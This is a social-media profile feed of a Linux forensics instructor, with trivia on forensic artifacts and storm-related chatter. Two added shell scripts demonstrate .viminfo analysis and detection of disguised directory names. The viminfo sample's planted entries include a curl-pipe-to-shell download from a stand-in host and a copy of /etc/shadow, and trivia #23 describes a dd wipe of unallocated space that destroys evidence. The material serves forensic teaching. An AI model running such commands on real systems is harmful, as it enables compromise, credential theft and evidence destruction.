I am retiring this social media account. Find me as @hal_pomeranz@infosec.exchange

Orlando, FL
Joined November 2008
Hal Pomeranz retweeted
This is a real treat!
Wow! That’s an amazing deep dive on NTP, its creator David Mills, and old-school open source communities. newyorker.com/tech/annals-of…
Daily Linux Forensics Trivia #26 - Name three different logs where you can normally find a record of user logins.
Trivia Answer #25 - Look at the user’s $HOME/.viminfo file. The file contains information on recently edited files, search terms, commands typed at the “:” prompt, and (probably most useful in this case) commands executed via shell escape.
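The .viminfo artifact named in the trivia answer, worked through as an added example (not part of the original post, and not Hal's own tooling). It assumes the Vim 8 viminfo layout, where ":cmd" lines are command-line history (a ":!cmd" entry is a shell escape), "?/pat" lines are search history, and "> /path" lines are the per-file mark history that effectively lists recently edited files; the sample file and every command in it are constructed for the demo.

```sh
#!/bin/sh
# Added example: extract the four artifact types from a .viminfo file.
# Assumed Vim 8 layout:
#   ":cmd"     command-line history (":!cmd" = shell escape)
#   "?/pat"    search history (second char is the last search direction, / or ?)
#   "> /path"  per-file mark history, i.e. files recently edited
#   "|..."     machine-readable duplicate of the preceding entry (ignored)
set -e

viminfo_commands()      { grep '^:'  -- "$1" | sed 's|^:||'     || true; }
viminfo_shell_escapes() { grep '^:!' -- "$1" | sed 's|^:!||'    || true; }
viminfo_searches()      { grep '^?'  -- "$1" | sed 's|^?[/?]||' || true; }
viminfo_edited_files()  { grep '^> ' -- "$1" | sed 's|^> ||'    || true; }

# Constructed sample, not a real user's file. "sudo vim" with no arguments
# leaves nothing useful in .bash_history, but root's .viminfo still records
# which files were opened and which commands ran behind the ":" prompt.
SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
# This viminfo file was generated by Vim 8.2.
# Command Line History (newest to oldest):
:wq
|2,0,1665000000,,"wq"
:!cat /etc/shadow > /tmp/.s
|2,0,1664999900,,"!cat /etc/shadow > /tmp/.s"
:e /etc/sudoers
|2,0,1664999800,,"e /etc/sudoers"
:!curl -s http://198.51.100.7/x | sh
|2,0,1664999700,,"!curl -s http://198.51.100.7/x | sh"
# Search String History (newest to oldest):
?/NOPASSWD
|2,1,1664999850,,"NOPASSWD"
# History of marks within files (newest to oldest):
> /etc/sudoers
    *   1664999800  0
> /root/.ssh/authorized_keys
    *   1664999600  0
EOF

echo "== all : commands ==";        viminfo_commands "$SAMPLE"
echo "== shell escapes (:!) ==";    viminfo_shell_escapes "$SAMPLE"
echo "== searches ==";              viminfo_searches "$SAMPLE"
echo "== recently edited files =="; viminfo_edited_files "$SAMPLE"
```

Point the functions at /root/.viminfo for the sudo case (and at each user's $HOME/.viminfo otherwise); entries are stored newest first, and the trailing "|" line after each one carries a Unix timestamp you can line up against the rest of your timeline.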
Replying to @daveshackleford
“Self-discovery”?
Holy smokes! Glad to hear the prognosis is good though. Rest up, big buddy!
And power is restored! Thanks @DukeEnergy for working so hard for Floridians in the wake of hurricane Ian.
Daily Linux Forensics Trivia #25 - A user’s .bash_history file shows repeated use of “sudo vim” with no other arguments. What other artifact could you inspect to get a better picture of their activities?
Trivia Answer #24 - One of the directories is named “.. ” (dot dot space) or some other similar name with a non-printing character. Use “ls -b” to see the non-printing characters. @MalwareJake was suspiciously quick with the answer on this one… almost as if… nah!
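The “dot dot space” trick from the trivia answer, as an added example (not part of the original post). Besides showing the “ls -b” view, it adds a find-based sweep for any entry whose name contains whitespace or a control character, which is how you would hunt for this across a whole tree rather than eyeballing one listing. The demo directory tree is constructed.

```sh
#!/bin/sh
# Added example: spot directory entries disguised with whitespace or
# control characters, the trick behind a fake ".." entry.
set -e

# Every entry under $1 whose basename contains a space, tab, newline or
# other non-printing byte. LC_ALL=C makes the classes operate on raw bytes.
find_suspicious_names() {
  LC_ALL=C find "$1" -mindepth 1 -name '*[[:space:][:cntrl:]]*' -print
}

# Constructed demo tree: one honest directory and two disguised ones.
DEMO=$(mktemp -d)
mkdir -- "$DEMO/logs"
mkdir -- "$DEMO/.. "                   # "dot dot space"
mkdir -- "$DEMO/$(printf '.ssh\t')"    # trailing tab

echo "== plain ls -la: the two '..' entries look identical =="
ls -la -- "$DEMO"
echo "== ls -lab: escapes reveal the space and the tab =="
ls -lab -- "$DEMO"
echo "== find sweep =="
find_suspicious_names "$DEMO"
```

Run the sweep against a mounted image (or "/" on a live box) and review the hits; recent GNU coreutils quotes such names when ls writes to a terminal, but "-b" works the same in scripts and on older systems, and the find sweep does not depend on ls at all.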
Replying to @elpie
We’re good, although power has been out since this morning. The storm ended up crossing the state well south of us—very unpredictable storm track on this one.
Replying to @jeffmcjunkin
If you have on-prem Exchange, assume breach
Replying to @johullrich
We lost power this morning after the storm had passed us to the south. Looks like most of the greater Orlando area is without power.
Let me add that a lot of these folks come in from out of state to support us during these disasters. They leave their homes and families and head into harm’s way to get the lights back on. Bravo!
40k+ linemen are waiting by in Florida right now ready to go to work when they can. Legit superstars.
Daily Linux Forensics Trivia #24 - You look at a directory listing and there are two subdirectories named “..”. How is this possible?
If you’re in a virtual environment that doesn’t pre-allocate disks, this also has the side-effect of increasing the storage used by your instance and making it more costly to get a forensic copy.
Trivia Answer #23 - Lots of responses, including @rvandenbrink, @DfirNotes, and @jtsylve. The dd command will create a file called junk that will consume all unallocated blocks and overwrite them with random data. This should obliterate any evidence in unallocated.
Replying to @darthsaac
Good so far, just a lot of rain and wind here. You all OK?
Replying to @bettersafetynet
I have to explain to my dog that it’s going to be windy and rainy for the next 48 hours and the bathroom is still OUTSIDE
Also can we take a moment to recognize your mom's badass koala socks!
This panel was a lot of fun!
Here's more good stuff from Way West 2022... it's "Everything Old is New Again" with @hal_pomeranz , @edskoudis , @AlyssaM_InfoSec, and Tony Sager! youtube.com/watch?v=cT3YXCqe…